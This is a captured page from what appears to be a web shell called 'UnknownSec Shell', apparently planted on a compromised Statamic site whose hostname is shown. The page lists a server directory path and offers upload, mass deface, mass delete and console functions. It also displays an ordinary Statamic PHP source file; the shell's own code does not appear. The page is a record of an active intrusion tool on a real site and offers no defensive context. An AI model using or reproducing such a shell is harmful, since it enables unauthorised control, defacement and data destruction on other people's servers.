shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Query
/
Scopes
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
AllowsScopes.php
<?php namespace Statamic\Query\Scopes; use Statamic\Support\Str; trait AllowsScopes { public function allowQueryScope(string $scope, ?string $method = null) { /** @var \Illuminate\Support\Collection $scopes */ $scopes = app('statamic.query-scopes'); $method ??= Str::camel($scope::handle()); $scopes->put( $class = get_class($this->query()), $scopes->get($class, collect())->put($method, $scope) ); } }
© 2026 UnknownSec